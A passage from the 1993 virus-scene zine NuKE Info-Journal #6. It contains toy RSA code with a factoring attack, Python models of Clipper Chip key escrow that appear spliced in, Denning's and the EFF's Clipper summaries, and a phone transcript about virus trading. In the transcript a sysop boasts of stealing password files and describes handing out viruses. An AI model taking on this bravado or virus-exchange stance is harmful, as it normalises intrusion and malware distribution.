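    p is the private exponent, the inverse of P modulo L (P*p = 1 mod L).
    The article omits the requirement that P be coprime to L; without it
    no inverse exists."""
    N = a * b
    L = lcm(a - 1, b - 1)
    if gcd(P, L) != 1:
        raise ValueError("P has no inverse mod L; pick another P")
    p = pow(P, -1, L)                 # modular inverse, Python 3.8+
    return N, P, p


def encrypt(M, P, N):
    return pow(M, P, N)               # C = M^P (mod N)


def decrypt(C, p, N):
    return pow(C, p, N)               # M = C^p (mod N)


def encrypt_text(text, P, N):
    """Encrypt the ASCII code of each character separately, as the article
    suggests.  Identical letters give identical numbers: with no padding or
    randomisation this is a substitution cipher wearing an RSA badge."""
    return [encrypt(ord(ch), P, N) for ch in text]


def factor(N):
    """Trial division.  Instant for a toy N; the security of RSA rests on
    this (and every cleverer method) being infeasible for a real N."""
    f = 2
    while f * f <= N:
        if N % f == 0:
            return f, N // f
        f += 1
    raise ValueError("no nontrivial factor; N is not an RSA modulus")


def recover_private_key(N, P):
    """The attack in the article: factor N into a and b, recompute L, and
    invert the public exponent.  Only N and P, the public values, are used."""
    a, b = factor(N)
    return pow(P, -1, lcm(a - 1, b - 1))


if __name__ == "__main__":
    N, P, p = keygen(61, 53, 17)       # constructed toy primes and exponent
    C = encrypt(65, P, N)              # 'A'
    print("N=%d P=%d p=%d  C=%d  M=%d" % (N, P, p, C, decrypt(C, p, N)))
    print("per-character ciphertext of ATTACK:", encrypt_text("ATTACK", P, N))
    print("private exponent recovered from (N, P):", recover_private_key(N, P) == p)
```

Note how little the attacker needs: the public pair (N, P) alone, once N is factored, yields p. Everything in the scheme therefore rests on the size of N; with 1024-bit moduli the trial division above would not finish before the heat death of the universe, which is the whole point.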
Breaking the system requires determining `a' and `b', the factors of `N' (don't forget `N' and `P' are publicly known). Once you know `a' and `b' you can easily calculate L; knowing L and P, you can calculate `p' (lower case) and decrypt the ciphertext. This boils down to the task of factoring a number into its prime components, a popular problem in number theory that continues to occupy the minds and computers of mathematicians around the world. In October 1988 it took an international group of computer scientists nearly a month to factor a 100-digit number. More than 400 computers worked on the problem during idle hours to find the number's two factors, one 41 digits long, the other 60 digits long. In June 1990 another team factored a 155-digit number. The number was hand-picked to make the task easier, but it still took 275 years' worth of ONE computer's time. To keep pace with ever-faster computers, RSA's users can simply add more digits to the key.

===============================================================================

Volume 1, Issue 6, May 1993                                NuKE Info-Journal #6

                    "Clipper Chip : New Government Standard?
                            or New Government Joke?"
                                       By
                                 NuKE Supporters

% New Government Standard or Joke? %

Since the beginning of the new year we have been waiting to hear from NIST whether DES will remain the standard encryption method used by federal agencies. The computer industry would like NIST to adopt RSA technology, but that is not likely to happen. One reason: if RSA, a privately developed and patented technology, became the new standard, the government would have to pay royalties for its use.
And _even_ more important, the NSA does not want the government to back the RSA encryption system. Why? "The NSA dislikes our system because it's too hard to break!" and "They clearly don't like what we do, but we're succeeding in spite of that," are statements by James Bidzos, president of RSA Data Security. And frankly, this rings true. RSA was developed in 1978, more than 15 years ago! After so many years of resisting public-key encryption systems, the government has _finally_ endorsed one as a new national standard. Unlike RSA, however, the government's DSA (Digital Signature Algorithm) can be run with a single government-issued _prime number_ shared by every user. Where's the trust? I stated in the previous info-journal that the NSA would _never_ introduce an encryption system that is unbreakable by them! The `Clipper Chip' is a further step in the same direction. It does not use DSA (a signature algorithm, which encrypts nothing) but a classified symmetric cipher, Skipjack, and every chip's secret unit key is generated and held in escrow by the government, as the technical summary by Dorothy Denning reproduced below spells out. What the government is saying in both cases is: "Take a P! Not any P! This P!" (Read the RSA article in this issue to understand what P is in a public-key algorithm.) What good is it if we are `tricked' into using parameters and keys that the government issues? It only means that the government (NSA) wants the cipher to be unbreakable to the general public. But if the NSA wishes to decipher your cipher, and you are using this government standard, it can do so with ease, and without any cryptanalysis at all. It's not that you don't trust anybody; it's that you don't trust everybody, and `everybody' includes the government! Why should we let the government get the upper hand again? We were taken in the first time with DES, and now it is trying the same thing all over again.

% Clipper Released %

I take it for granted that everybody has read the document on the Clipper Chip released by The White House, Office of the Press Secretary. If not, you may obtain a copy by calling a NuKE-NeT system and looking through the old messages posted in the General message base.
Or you can get the file via anonymous ftp from csrc.ncsl.nist.gov in directory /pub/nistnews, and via the NIST Computer Security BBS at 301-948-5717. A copyrighted article in the Friday, May 7th, 1993 `Washington Post' describes a letter sent to President Clinton by 30+ major electronics companies and trade associations, expressing their concern about the Clipper chip. The article describes what the Clipper chip is, and explains that it was developed to allow encryption of voice and fax with a method for law enforcement to listen in when authorized. It summarizes the key aspects of the chip, and says: "Since the White House proposed the plan three weeks ago, many in the computer and communications industries have responded with scepticism. Critics wonder how good the secret government technology really would be and worry that agencies might abuse it to tap calls without court orders." A NIST spokesman said they hadn't read the letter yet, but commented that Clinton has made it clear he wants industry participation. Signers of the letter include IBM, AT&T, Lotus, Microsoft, McCaw Cellular and MCI, as well as the ACLU. The article notes the apparent conflict between AT&T signing the letter and its stated intention to use the chip. AT&T's response was that they are just seeking clarification and do not oppose Clipper.

Now compare the structures of Clipper and DES. DES has a 56-bit key, so an exhaustive key search is 2^56 trials, and 16 rounds. Clipper's cipher is said to use 32 rounds and an 80-bit key, so a search is 2^80 trials. Whatever one believes a desktop machine can search today, 2^80 is 2^24 (about 16 million) times the work of a DES search; brute force against Clipper is clearly impractical for a long time to come. When DES was named the standard in 1977, it was clear that the algorithm's strength rested more on the structure of its S-boxes than on the key, and the design rules for those S-boxes were classified. That left the NSA suspected of holding a `backdoor' in DES, and certainly with the upper hand in crypto technology.
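The escrow and law-enforcement mechanism that the Denning summary reproduced later in this article describes, modelled in Python as an added example. This is neither the chip's code nor anything from the article: Skipjack was classified, so an HMAC-based Feistel network of the same key and block size stands in for it; the three fixed padding blocks are invented; the 30-bit serial number is simply kept in 4 bytes; and ECB with zero padding is used where the real device would pick one of its modes. The point it makes concrete is the one above: whoever holds the family key F and both escrow halves recovers every session key with no key search at all, while either half alone recovers nothing.

```python
# Added example: a model of the Clipper unit-key escrow and the law
# enforcement access field, with a stand-in cipher.  Not the chip's code.
import hashlib
import hmac

KEY_LEN, BLOCK = 10, 8      # 80-bit keys and 64-bit blocks, as in the summary


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key, half, r):
    # Round function: HMAC-SHA256 of one 32-bit half, keyed by the 80-bit key
    # and the round number.  Stands in for the classified Skipjack internals;
    # any keyed pseudorandom function gives a valid Feistel cipher here.
    return hmac.new(key + bytes([r]), half, hashlib.sha256).digest()[:4]


def E(block, key, rounds=8):
    """Encrypt one 64-bit block under an 80-bit key (Feistel network)."""
    assert len(block) == BLOCK and len(key) == KEY_LEN
    L, R = block[:4], block[4:]
    for r in range(rounds):
        L, R = R, _xor(L, _f(key, R, r))
    return R + L


def D(block, key, rounds=8):
    """Inverse of E: the same network with the rounds run backwards."""
    assert len(block) == BLOCK and len(key) == KEY_LEN
    L, R = block[:4], block[4:]
    for r in reversed(range(rounds)):
        L, R = R, _xor(L, _f(key, R, r))
    return R + L


def ecb(fn, data, key):
    """Run E or D over a zero-padded buffer block by block."""
    data += b"\x00" * (-len(data) % BLOCK)
    return b"".join(fn(data[i:i + BLOCK], key) for i in range(0, len(data), BLOCK))


# The three fixed padding blocks are not public; these values are made up.
PADS = (b"\x00\x00\x00\x01", b"\x00\x00\x00\x02", b"\x00\x00\x00\x03")


def escrow_key_parts(serial, S1, S2):
    """Chip-programming step from the summary: pad the serial number N three
    ways, compute Ri = E[D[E[Ni;S1];S2];S1], concatenate the 192 bits and take
    U1 = first 80 bits, U2 = next 80 (the last 32 are discarded).
    N is kept in 4 bytes here instead of 30 bits plus 34 bits of padding."""
    assert len(serial) == 4
    R = b"".join(E(D(E(serial + pad, S1), S2), S1) for pad in PADS)
    return R[:KEY_LEN], R[KEY_LEN:2 * KEY_LEN]


def unit_key(U1, U2):
    """U = U1 XOR U2: what gets burned into the chip."""
    return _xor(U1, U2)


def make_leaf(K, U, serial, F):
    """Law enforcement block E[E[K;U] + N; F], emitted alongside E[M;K]."""
    return ecb(E, ecb(E, K, U) + serial, F)


def law_enforcement_decrypt(leaf, F, agency1, agency2, ciphertext):
    """Wiretap side: open the LEAF with the family key F, read the serial
    number, fetch that chip's U1 and U2 from the two escrow agencies, rebuild
    U, unwrap the session key K and decrypt the traffic."""
    in_clear = ecb(D, leaf, F)
    wrapped_K, serial = in_clear[:16], in_clear[16:20]
    U = unit_key(agency1[serial], agency2[serial])
    K = ecb(D, wrapped_K, U)[:KEY_LEN]
    return ecb(D, ciphertext, K)


if __name__ == "__main__":
    S1, S2, F = b"\x11" * 10, b"\x22" * 10, b"\x33" * 10   # constructed seeds, family key
    serial = b"\x00\x00\x12\x34"
    U1, U2 = escrow_key_parts(serial, S1, S2)
    agency1, agency2 = {serial: U1}, {serial: U2}          # the two escrow floppies
    K = b"\x44" * 10                                       # session key for one call
    M = b"digitized voice!"
    C, leaf = ecb(E, M, K), make_leaf(K, unit_key(U1, U2), serial, F)
    print(law_enforcement_decrypt(leaf, F, agency1, agency2, C) == M)            # True
    print(law_enforcement_decrypt(leaf, F, agency1, {serial: bytes(10)}, C) == M)  # False
```

Two things worth noticing. The session key K never has to be recovered by cryptanalysis; it is handed over inside every conversation, sealed only with keys the government itself generated. And the split into U1 and U2 protects against one agency acting alone, not against the programming facility, which saw both seeds and every U.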
Clearly whatever computing power the NSA had in 1977, a desktop machine today has as much or more, so a 56-bit DES key is within reach of a well-funded attacker. An 80-bit key is not, and will not be for many years: each extra bit doubles the work. So brute force is the wrong thing to worry about. The real question is whether the NSA holds an advantage that lets it decipher the traffic `instantly', and with escrowed unit keys the answer is yes by design: whoever holds the escrowed halves needs no key search at all. The movie `Sneakers' hints at this issue, and we regard it as SciFi, fiction, for entertainment purposes only. Look deeper, a lot deeper: isn't it hinting at exactly this? I leave you with a technical summary of the Clipper Chip by Dorothy Denning, and an EFF analysis of the proposed Clipper Chip. These articles are distributed on an `as-is' basis, as that is how they were both publicly posted in the Internet newsgroup sci.crypt.

% The Clipper Chip : A Technical Summary %

Newsgroups: sci.crypt
Subject: THE CLIPPER CHIP: A TECHNICAL SUMMARY
Date: 19 Apr 93 18:23:27 -0400
Distribution: world
Organization: Georgetown University

The following document summarizes the Clipper Chip, how it is used, how programming of the chip is coupled to key generation and the escrow process, and how law enforcement decrypts communications. Since there has been some speculation on this newsgroup about my own involvement in this project, I'd like to add that I was not in any way involved. I found out about it when the FBI briefed me on Thursday evening, April 15. Since then I have spent considerable time talking with the NSA and FBI to learn more about this, and I attended the NIST briefing at the Department of Commerce on April 16. The document below is the result of that effort.
Dorothy Denning

---------------

THE CLIPPER CHIP: A TECHNICAL SUMMARY

Dorothy Denning
April 19, 1993

INTRODUCTION

On April 16, the President announced a new initiative that will bring together the Federal Government and industry in a voluntary program to provide secure communications while meeting the legitimate needs of law enforcement. At the heart of the plan is a new tamper-proof encryption chip called the "Clipper Chip" together with a split-key approach to escrowing keys. Two escrow agencies are used, and the key parts from both are needed to reconstruct a key.

CHIP STRUCTURE

The Clipper Chip contains a classified 64-bit block encryption algorithm called "Skipjack." The algorithm uses 80-bit keys (compared with 56 for the DES) and has 32 rounds of scrambling (compared with 16 for the DES). It supports all 4 DES modes of operation. Throughput is 16 Mbits a second. Each chip includes the following components:

    the Skipjack encryption algorithm
    F, an 80-bit family key that is common to all chips
    N, a 30-bit serial number
    U, an 80-bit secret key that unlocks all messages encrypted with the chip

ENCRYPTING WITH THE CHIP

To see how the chip is used, imagine that it is embedded in the AT&T telephone security device (as it will be). Suppose I call someone and we both have such a device. After pushing a button to start a secure conversation, my security device will negotiate a session key K with the device at the other end (in general, any method of key exchange can be used). The key K and message stream M (i.e., digitized voice) are then fed into the Clipper Chip to produce two values:

    E[M; K], the encrypted message stream, and
    E[E[K; U] + N; F], a law enforcement block.

The law enforcement block thus contains the session key K encrypted under the unit key U concatenated with the serial number N, all encrypted under the family key F.
CHIP PROGRAMMING AND ESCROW

All Clipper Chips are programmed inside a SCIF (secure computer information facility), which is essentially a vault. The SCIF contains a laptop computer and equipment to program the chips. About 300 chips are programmed during a single session. The SCIF is located at Mykotronx.

At the beginning of a session, a trusted agent from each of the two key escrow agencies enters the vault. Agent 1 enters an 80-bit value S1 into the laptop and agent 2 enters an 80-bit value S2. These values serve as seeds to generate keys for a sequence of serial numbers.

To generate the unit key for a serial number N, the 30-bit value N is first padded with a fixed 34-bit block to produce a 64-bit block N1. S1 and S2 are then used as keys to triple-encrypt N1, producing a 64-bit block R1:

    R1 = E[D[E[N1; S1]; S2]; S1] .

Similarly, N is padded with two other 34-bit blocks to produce N2 and N3, and two additional 64-bit blocks R2 and R3 are computed:

    R2 = E[D[E[N2; S1]; S2]; S1]
    R3 = E[D[E[N3; S1]; S2]; S1] .

R1, R2, and R3 are then concatenated together, giving 192 bits. The first 80 bits are assigned to U1 and the second 80 bits to U2. The rest are discarded. The unit key U is the XOR of U1 and U2. U1 and U2 are the key parts that are separately escrowed with the two escrow agencies.

As a sequence of values for U1, U2, and U are generated, they are written onto three separate floppy disks. The first disk contains a file for each serial number that contains the corresponding key part U1. The second disk is similar but contains the U2 values. The third disk contains the unit keys U. Agent 1 takes the first disk and agent 2 takes the second disk. The third disk is used to program the chips. After the chips are programmed, all information is discarded from the vault and the agents leave. The laptop may be destroyed for additional assurance that no information is left behind.

The protocol may be changed slightly so that four people are in the room instead of two.
The first two would provide the seeds S1 and S2, and the second two (the escrow agents) would take the disks back to the escrow agencies.

The escrow agencies have yet to be determined, but they will not be the NSA, CIA, FBI, or any other law enforcement agency. One or both may be independent from the government.

LAW ENFORCEMENT USE

When law enforcement has been authorized to tap an encrypted line, they will first take the warrant to the service provider in order to get access to the communications line. Let us assume that the tap is in place and that they have determined that the line is encrypted with Clipper. They will first decrypt the law enforcement block with the family key F. This gives them E[K; U] + N. They will then take a warrant identifying the chip serial number N to each of the key escrow agents and get back U1 and U2. U1 and U2 are XORed together to produce the unit key U, and E[K; U] is decrypted to get the session key K. Finally the message stream is decrypted. All this will be accomplished through a special black box decoder operated by the FBI.

ACKNOWLEDGMENT AND DISTRIBUTION NOTICE

All information is based on information provided by NSA, NIST, and the FBI. Permission to distribute this document is granted.

-------------------------------------------------------------------------------

% EFF Analysis of the Clipper Chip %

April 16, 1993

INITIAL EFF ANALYSIS OF CLINTON PRIVACY AND SECURITY PROPOSAL

The Clinton Administration today made a major announcement on cryptography policy which will affect the privacy and security of millions of Americans. The first part of the plan is to begin a comprehensive inquiry into major communications privacy issues such as export controls which have effectively denied most people easy access to robust encryption as well as law enforcement issues posed by new technology.
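The unit-key derivation, law enforcement block and two-agency recovery from Denning's technical summary above, carried through end to end as an added example (it is not code from the original post or from the Clipper program). Since Skipjack was classified, a toy 64-bit Feistel cipher stands in for E[x; k] and D[x; k]; the three fixed 34-bit pads and the zero-padding of the 80-bit session key into 64-bit blocks are assumptions.

```python
"""Model of the Clipper key-escrow scheme as described in Denning's summary.

Added illustration only. The real Skipjack algorithm was classified in 1993, so a
toy 64-bit Feistel cipher stands in for E[x; k] / D[x; k]; the three fixed 34-bit
pads and the way an 80-bit session key is split into 64-bit blocks are assumptions.
"""
import hashlib

BLOCK = 8     # 64-bit block, like Skipjack
KEYLEN = 10   # 80-bit keys (U, F, S1, S2, K)
PADS = (0x0, 0x1, 0x2)  # hypothetical fixed 34-bit pads used to build N1, N2, N3


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _f(half: bytes, key: bytes, rnd: int) -> bytes:
    # Keyed round function of the toy Feistel network (nothing to do with Skipjack's).
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:4]


def E(block: bytes, key: bytes) -> bytes:
    """Stand-in for Skipjack encryption E[block; key]: a 4-round Feistel network."""
    assert len(block) == BLOCK and len(key) == KEYLEN
    l, r = block[:4], block[4:]
    for i in range(4):
        l, r = r, _xor(l, _f(r, key, i))
    return r + l


def D(block: bytes, key: bytes) -> bytes:
    """Inverse of E: the same rounds run backwards."""
    assert len(block) == BLOCK and len(key) == KEYLEN
    r, l = block[:4], block[4:]
    for i in reversed(range(4)):
        l, r = _xor(r, _f(l, key, i)), l
    return l + r


def _ecb(data: bytes, key: bytes, fn) -> bytes:
    # Apply E or D block by block; callers pad to a multiple of BLOCK.
    assert len(data) % BLOCK == 0
    return b"".join(fn(data[i:i + BLOCK], key) for i in range(0, len(data), BLOCK))


def derive_unit_key(n: int, s1: bytes, s2: bytes):
    """SCIF programming step: (U1, U2, U) for serial N from the two agents' seeds.

    R_i = E[D[E[N_i; S1]; S2]; S1]; U1 = first 80 bits of R1|R2|R3, U2 = next 80,
    the last 32 bits are discarded, and U = U1 XOR U2. Note that U is fully
    determined by N, S1 and S2: whoever holds both seeds can regenerate every U.
    """
    assert 0 <= n < 2 ** 30
    r = b""
    for pad in PADS:
        n_i = ((n << 34) | pad).to_bytes(BLOCK, "big")   # 30-bit N + 34-bit pad
        r += E(D(E(n_i, s1), s2), s1)
    u1, u2 = r[:KEYLEN], r[KEYLEN:2 * KEYLEN]
    return u1, u2, _xor(u1, u2)


def law_enforcement_block(k: bytes, u: bytes, n: int, f: bytes) -> bytes:
    """Chip output E[E[K; U] + N; F] that travels alongside the encrypted voice."""
    assert len(k) == KEYLEN
    ek = _ecb(k + b"\x00" * 6, u, E)                    # 80-bit K zero-padded to 2 blocks
    inner = ek + n.to_bytes(4, "big") + b"\x00" * 4     # serial N, padded to a block
    return _ecb(inner, f, E)


def recover_session_key(leaf: bytes, f: bytes, escrow1: dict, escrow2: dict):
    """Law enforcement side: F reveals N, both escrowed halves rebuild U, U reveals K."""
    inner = _ecb(leaf, f, D)
    ek, n = inner[:16], int.from_bytes(inner[16:20], "big")
    u = _xor(escrow1[n], escrow2[n])                    # needs BOTH agencies' key parts
    return _ecb(ek, u, D)[:KEYLEN], n


def demo():
    """End-to-end run on constructed values; returns (K sent, K recovered, N)."""
    s1, s2 = bytes(range(10)), bytes(range(10, 20))     # constructed agent seeds
    f = b"family-key"                                    # constructed 80-bit family key
    escrow1, escrow2, chips = {}, {}, {}
    for n in (1000, 1001, 1002):                         # one programming session
        u1, u2, u = derive_unit_key(n, s1, s2)
        escrow1[n], escrow2[n], chips[n] = u1, u2, u     # disks 1, 2 and 3
    k = b"sessionkey"                                    # constructed session key K
    leaf = law_enforcement_block(k, chips[1001], 1001, f)
    recovered, n = recover_session_key(leaf, f, escrow1, escrow2)
    return k, recovered, n


if __name__ == "__main__":
    print(demo())
```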
However, EFF is very concerned that the Administration has already reached a conclusion on one critical part of the inquiry, before any public comment or discussion has been allowed. Apparently, the Administration is going to use its leverage to get all telephone equipment vendors to adopt a voice encryption standard developed by the National Security Agency. The so-called "Clipper Chip" is an 80-bit, split key escrowed encryption scheme which will be built into chips manufactured by a military contractor. Two separate escrow agents would store users' keys, and be required to turn them over to law enforcement upon presentation of a valid warrant. The encryption scheme used is to be classified, but the chips will be available to any manufacturer for incorporation into their communications products.

This proposal raises a number of serious concerns.

First, the Administration appears to be adopting a solution before conducting an inquiry. The NSA-developed Clipper chip may not be the most secure product. Other vendors or developers may have better schemes. Furthermore, we should not rely on the government as the sole source for Clipper or any other chips. Rather, independent chip manufacturers should be able to produce chipsets based on open standards.

Second, an algorithm cannot be trusted unless it can be tested. Yet the Administration proposes to keep the chip algorithm classified. EFF believes that any standard adopted ought to be public and open. The public will only have confidence in the security of a standard that is open to independent, expert scrutiny.

Third, while the use of the split-key, dual-escrowed system may prove to be a reasonable balance between privacy and law enforcement needs, the details of this scheme must be explored publicly before it is adopted. What will give people confidence in the safety of their keys? Does disclosure of keys to a third party waive individuals' fifth amendment rights in subsequent criminal inquiries?
In sum, the Administration has shown great sensitivity to the importance of these issues by planning a comprehensive inquiry into digital privacy and security. However, the "Clipper chip" solution ought to be considered as part of the inquiry, not be adopted before the discussion even begins.

DETAILS OF THE PROPOSAL:

ESCROW

The 80-bit key will be divided between two escrow agents, each of whom hold 40 bits of each key. Upon presentation of a valid warrant, the two escrow agents would have to turn the key parts over to law enforcement agents. Most likely the Attorney General will be asked to identify appropriate escrow agents. Some in the Administration have suggested one non-law enforcement federal agency, perhaps the Federal Reserve, and one non-governmental organization. But, there is no agreement on the identity of the agents yet.

Key registration would be done by the manufacturer of the communications device. A key is tied to the device, not to the person using it.

CLASSIFIED ALGORITHM AND THE POSSIBILITY OF BACK DOORS

The Administration claims that there are no back door means by which the government or others could break the code without securing keys from the escrow agents and that the President will be told there are no back doors to this classified algorithm. In order to prove this, Administration sources are interested in arranging for an all-star crypto cracker team to come in, under a security arrangement, and examine the algorithm for trap doors. The results of the investigation would then be made public.

GOVERNMENT AS MARKET DRIVER

In order to get a market moving, and to show that the government believes in the security of this system, the feds will be the first big customers for this product. Users will include the FBI, Secret Service, VP Al Gore, and maybe even the President.

FOR MORE INFORMATION CONTACT:

Jerry Berman, Executive Director
Daniel J. Weitzner, Senior Staff Counsel
Internet Address: eff@eff.org

===============================================================================
================================================================================

Volume 1, Issue 6, May 1993                                NuKE Info-Journal #6

NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
"Lies, Scandals, and Rumours of the Anti-Virus Community"
By Alan Solomon, ARiSToTLe, Rock Steady
E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu

The following is the _exact_ conversation/interview between Aristotle, Rock Steady, and Alan Solomon, concerning the virus problem of today. The conversation was recorded by Rock Steady, the NSA (naturally), and Unitel, who alerted the RCMP because this was a 5 hour conference billed onto NuKE's own PBX, which Unitel thought was suspicious, so they killed our PBX! (Geez, talk about trust!) Nothing here has been recreated; this conversation was recorded on tape, in rather bad quality, but nevertheless it will stand against any accusation of fabrication, which it is not!

PS: Don't forget to read the conclusion at the end of the conversation; if you must read one thing, may it be the conclusion.

% In the Beginning... there was light, then Rock, and of course Aristotle %

NOTE: RS=Rock Steady ; AR=Aristotle ; SO=Alan Solomon ; ??= Mrs ?

??> Hello, may I help you?
AR> Alan Solomon please.
??> Who's calling?
AR> John
SO> Hello?
AR> Hi, how you doing? If you're not busy, ah.. you know Rock Steady is here on the phone with me.
SO> Yeah
AR> And I wanted to ask you a couple of things if I could.
SO> Yeah
AR> That article came out in VNI. [Virus News International; it's a magazine]
SO> Which one
AR> The one that came out in the May issue.
SO> Yeah
AR> Who's the author of that?
SO> Which article are you talking about?
AR> The one that says `Back in Business'
SO> ah, I don't know which is the article you are referring to.
AR> ah, John, also known publicly as-
SO> The trouble is ah, it's been a few weeks since I read it. Does it have an author to it?
AR> No.
SO> Then it's written by the editor.
AR> It's written by Paul, okay I've talked to Paul about it. Okay I've twice seen in there whereby you have written articles and tossed me into it.
SO> Toss you into what?
AR> ah a couple of articles where you mention my name.
SO> Did I say anything that wasn't true?
AR> ah, that's not what I'm getting at. That's not what I'm calling about. What I'm calling about is this particular article where they mention the school and everything.
SO> Yeah
AR> I spoke to Paul the other day, and he sent me a copy in the mail.
SO> Yeah
AR> So I was wondering, is there going to be a retraction on it?
SO> Is it not true then?
AR> Na-
RS> What right gives you-
SO> But you told me you were a student at-
AR> No, no, no, about being Back in Business. It stated three times that I publicly stated that I was closing my system.
SO> Well I'm confused-
RS> That's a start
SO> ah, I got a fax, no it's an email, I forget now, this was a few months ago. Where you were offering viruses for sale. Is that not the case?
AR> Na, that's not the case.
SO> Something you posted on Fidonet.
AR> I didn't know that I posted it!
SO> It's a good forgery, if it's not you that did this.
AR> Well, my point is-
SO> Want me to call you back, this is costing you a fortune.
AR> That's okay I can handle it. [Yeah sure, RS is paying for this 3-way]
RS>
AR> Reason I had Rock Steady call was, we were talking 'bout this as well. ah-
SO> When I talk about your position, the position is that you're positioned in William & Mary's college, or you graduated?
AR> I graduated!
SO> So you're no longer with the college.
AR> I graduated from the college, ah after this issue came out. But the point of it is this, it states in here real clearly that I'm Back in Business! And that I have forgotten my pledge, kay!
I think I went back into business when I changed to VR, there's nobody on my board!
SO> So you're not offering viruses any more?
AR> I haven't since that day I told you. See I have ten people, believe it or not, they're all AV.
SO> Who are they.
AR> has some boys that like to call me from time to time.
SO> What do you mean `his boys'
AR> Some people he's got working for him. They call me up.
SO> The trouble is, I don't know what you mean by the AV.
AR> Well AntiVirus researchers, people that do beta testing for AntiVirus software.
SO> The trouble is, anyone can call and say they're AV.
AR> Well okay, anybody can call themselves a virus writer. I'm pr-
SO> Ththth-that's why I'm asking you-
AR> I'm really pissed off about this, okay. The way they mention my name in there, okay, they basically came out and said I was fire! This guy on the phone right now knows for a fact that I've been doing research for this crap for a year now. And a-
SO> Sorry, this guy you say, you mean Joe? [Joe Greco aka Rock Steady]
AR> Yeah, okay... Joe?
RS> Yeah
AR> okay, anyway this stuff has been going on you know, and it's been nothing but research. I told Paul Robison to call the school! And formally request that article and he can have it.
SO> What's the phone number.
AR> ah, okay, ah area code 804-221-4000 is the main number.
SO> And who is the article with.
AR> ah, Kenny Chang
SO> So who's posting all the messages saying you're selling viruses?
AR> I don't know.
SO> Because they seem to be coming-
AR> Well I'll tell yeah
RS> Do you have those posts? We'd like to see them.
SO> I could fax them to you. Gimme a fax number
AR> I don't have a fax number
RS> Well I'm unwilling to give you my fax number.
SO> Well I received them as a fax.
AR> Well that's my point, the school is rather pissed off about this as well.
SO> Allow me to fax them too?
AR> well I dunno, if somebody's posting out there, I can take and change my system right now.
I can phreak one of these password files from any front-door, and when I get in, I can get anybody's session password, and change my damn fido feed to anybody in the world.
RS> Are you willing to receive a copy by mail Aristotle, yes or no?
AR> Sure I'll take a copy by the mail.
RS> Or I can make him send it to the NuKE PO Box.
AR> Sure, that's fine.
RS> Okay Alan, I'll call you back in a week to give you our PO Box to receive that fax.
SO> I could do that
AR> Yeah, I'd like to have that. Now here's what it is...okay...I've been looking at this stuff upside down, and one-the-other, and there's a whole lot of things I was unhappy about. Alan I'm really pissed about this one.
SO> What are you pissed about?
AR> What am I pissed about! Damn Alan, you know. For a year now everyone knows that I'm here straightening this crap out. Between Sara Gordon's posting out there about VX-Net being an underground exchange network, and all this kind of horse-shit and everything. And this article coming out here, saying I'm a student in this school, now why did you have to put that in there?
SO> Well because, what you say, was that you were doing this project.
AR> But nobody mentioned that!
SO> You said that!
AR> But in the article it doesn't say anything about this damn research thing! The only thing that is said is that I'm a student at William and Mary's. It doesn't mention the fact that I'm doing research for the school!
RS> Of course it all ends up that they pick out what they want, and paint a different picture of you!
AR> I've always been pretty straight with you. You know Sara Gordon walks around saying, "I'll never log on to a bulletin board, never, never, never!" [Meaning a `Virus' exchange bulletin board]
SO> It's been a few weeks since I read that article, can I call you back while I go get a copy of this article. Wait, I'll see if I can get it...
SO> Sorry, I can't seem to find a copy in the house. See you called me at home, rather than the office. What did the article say?
AR> It said, "John, also known publicly under the name Aristotle, sysop of The Black Axes BBS. One of several names used by Mr. John, recently announced the self-imposed shut down of his bulletin board system. For a while it looked like there would be no more viruses for sale, or given away free, depending on who you were! ..... John, a student at William and Mary's college, has apparently forgotten his pledge and is back in business!"
AR> Now then, there's a whole lot of people here running around, saying all sorts of things. Lemme ask you something, a lady under the name Katy, no, Cary something.
SO> Cary, Cary Lang?
AR> Yes, she says she works for you! ok?
SO> Not quite true.
AR> Well she also states she was on my board, and she's from Finland!
SO> Well, Cary Lang is Finnish, doesn't work for me, works for a company called "Land Vision"
AR> Same place with that guy `Dire', Kaluco Janhontalo or something like this. Now this lady (Cary), was posting in the echoes, in response to some letter saying `John's board's down you know...' She comes out and says, "NO, it's up, plenty of viruses, I was on there today." She used in her tag line, "Works for Dr. Alan Solomon"
SO> Let me give you the accurate information on Cary, Cary isn't a lady, Cary is a man.
AR> Pardon me.
SO> Secondly, he works for a company called Land Vision, and sells our AntiVirus toolkit.
AR> Well that lady-
SO> He's not a lady.
AR> Well okay, that person-
SO> MAN
AR> okay, that man was never on my board, the only Finnish person on my board is that guy named Janhontalo, okay.
SO> Doesn't ring a bell.
AR> Well, I'm kinda disturbed by it, cuz I believe when the school kicks back up, and they read this, huh.... The only person that knows about this right now is the dean.
SO> Well I think, that if certain of my views were not true, then certainly we would do a retraction.
AR> The chancellor of the college will be, very shortly, Margaret Thatcher.
SO> Really?
AR> Oh Yes!
She'll be the chancellor as of the 1st of July, 1993.
SO> So what is the true situation? So what you said was, that you took the Black Axes down?
AR> No! What I said was the virus exchange, the virus stuff, is down!
SO> So the Black Axes is still running?
AR> Yes.
SO> Do you have any viruses on it?
AR> For download, NO. There are 10 people that have access to that, on my board.
SO> So there are no viruses for download?
AR> Only 10 people have access to that, on my board!
SO> Who are they?
AR> ah, sure if you wanna do that, sure! You want me to name who's on there?
SO> Yeah.
AR> Some of these people are going to be mighty upset! These are AntiVirus software people. Joe knows these people call, I know when he writes something he doesn't go off to these people and tell them...
AR> You know many don't trust my judgment on whom I give these viruses to, is what this all comes down to. How come then so many of my viruses have the S & S International logo in them?
SO> Frankly, I'd like to know that too. [S&S International is Solomon's company.]
AR> Well I already got the connection made! Well we've talked about David Chess, and he is suspected of trading with McAfee.
SO> Suspect is the wrong word, I think he does!
AR> Alright then, also we have a fellow by the name of Joseph Whales. Joe Whales is good buddies with guys in the NCSA, I got the whole NCSA collection! I got everything David Stang has put his hands on!
SO> Most of it is junk, you know that! [NCSA Virus Collection]
AR> Well there is more in there than just junk.
SO> That's true, I'm not saying it's all junk. I keep seeing these files beginning with exclamation marks, going round, and round, and round.
AR> I got the entire collection, I got 8 megs of junk!
SO> That's nothing, I got 110 megs of junk. [Glad to see you're proud of it!]
AR> Now then, this guy on the phone with me right now (Joe) doesn't write viruses to put on people's systems and NuKE the whole world! That's _not_ what we both do.
